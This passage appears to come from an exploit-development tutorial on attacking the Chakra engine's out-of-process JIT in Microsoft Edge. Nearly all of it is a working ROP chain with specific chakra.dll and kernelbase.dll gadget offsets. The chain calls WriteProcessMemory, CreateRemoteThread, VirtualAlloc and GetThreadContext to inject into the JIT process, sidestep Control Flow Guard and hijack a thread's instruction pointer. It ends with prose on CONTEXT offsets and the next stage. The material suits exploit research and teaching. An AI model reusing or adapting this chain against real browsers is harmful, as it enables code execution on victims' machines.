write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);      // 0x18028b4fe: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the chakra.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the address of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the chakra.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the address of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// VirtualAlloc() ROP chain
// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

// DWORD flProtect (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPVOID lpAddress (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)
next();

// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)
next();

// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)
next();

// Call KERNELBASE!VirtualAlloc
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

// GetThreadContext() ROP chain
// Stage 8 -> Dump the registers of our newly created thread within the JIT process to leak the stack

// First, let's store some needed offsets of our VirtualAlloc allocation, as well as the address itself, in the .data section of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108, kernelbaseHigh); // .data section of kernelbase.dll where we will store the VirtualAlloc allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// Save VirtualAlloc_allocation+0x30. This is the offset in our buffer (CONTEXT structure) that is ContextFlags
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we will store CONTEXT.ContextFlags
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// We need to set CONTEXT.ContextFlags. This address (0x30 offset from CONTEXT buffer allocated from VirtualAlloc) is in kernelbase+0x21a110
// The value we need to set is 0x10001F
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll with CONTEXT.ContextFlags address
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x0010001F, 0x00000000);             // CONTEXT_ALL
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write CONTEXT_ALL into CONTEXT.ContextFlags)
next();

// HANDLE hThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future mov qword [rax+0x20], rcx gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
next();

// LPCONTEXT lpContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
next();                                                                      
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// Call KERNELBASE!GetThreadContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x72d10, kernelbaseHigh); // KERNELBASE!GetThreadContext address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!GetThreadContext)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!GetThreadContext - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

// Locate CONTEXT.Rsp and store its address in .data of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we stored CONTEXT.ContextFlags
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x4c37c5, chakraHigh);		// 0x1804c37c5: mov rax, qword [rcx] ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f73a, chakraHigh);       // 0x18026f73a: add rax, 0x68 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118, kernelbaseHigh); // .data section of kernelbase.dll where we want to store CONTEXT.Rsp
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// Update CONTEXT.Rip to point to a ret gadget directly instead of relying on CreateRemoteThread start routine (which CFG checks)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f72a, chakraHigh);      // 0x18026f72a: add rax, 0x60 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // ret gadget we want to overwrite our remote thread's RIP with 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xfeab, chakraHigh);        // 0x18000feab: mov qword [rax], rcx ; ret  (Context.Rip = ret_gadget)
next();

After preserving CONTEXT.Rsp, we can manipulate CONTEXT.Rip to directly point to our ret gadget. We don’t really need to save this address, because once we are done writing to it, we simply don’t need to worry about it anymore.
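
The two `add rax` gadgets used above only make sense against the layout of the x64 CONTEXT structure. As a rough sketch (the offsets are the ones I understand to hold for the x64 CONTEXT definition in winnt.h and should be verified against your target build; the `contextFieldAddress` helper and the sample base address are made up purely for illustration), here is the arithmetic that takes us from ContextFlags to Rsp and then to Rip:

```javascript
// Offsets into the x64 CONTEXT structure (assumed from winnt.h; verify on your target)
const CONTEXT_OFFSETS = {
    ContextFlags: 0x30n,
    Rsp: 0x98n,
    Rip: 0xf8n
};

// Hypothetical helper: address of a CONTEXT field given the buffer's base address
function contextFieldAddress(base, field) {
    return base + CONTEXT_OFFSETS[field];
}

// Made-up base address standing in for the VirtualAlloc allocation
const contextBase = 0x000001f000000000n;

// The chain saves base+0x30, then applies "add rax, 0x68" and later "add rax, 0x60"
const flagsAddr = contextFieldAddress(contextBase, "ContextFlags");
const rspAddr = flagsAddr + 0x68n;   // 0x30 + 0x68 = 0x98 (CONTEXT.Rsp)
const ripAddr = rspAddr + 0x60n;     // 0x98 + 0x60 = 0xf8 (CONTEXT.Rip)

console.log(rspAddr === contextFieldAddress(contextBase, "Rsp"));
console.log(ripAddr === contextFieldAddress(contextBase, "Rip"));
```

This is only bookkeeping, but it is handy for double-checking a chain before debugging it in WinDbg.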

Now that we have RSP preserved, it is finally time to use one last call to WriteProcessMemory to write our final VirtualProtect ROP chain into the JIT process.

WriteProcessMemory ROP Chain (Round 4)

Our last step is to write our ROP chain into the remote process. You may be thinking - “Connor, we just hijacked RIP. Why can’t we just hijack RSP instead of writing our payload to the existing stack?” Great question! We know that if we call SetThreadContext, CFG doesn’t perform any validation on the instruction pointer to ensure we aren’t calling into the middle or end of a function. There is no way for CFG to know this! However, CFG does perform some slight validation of the stack pointer on SetThreadContext calls - via a function called RtlGuardIsValidStackPointer.

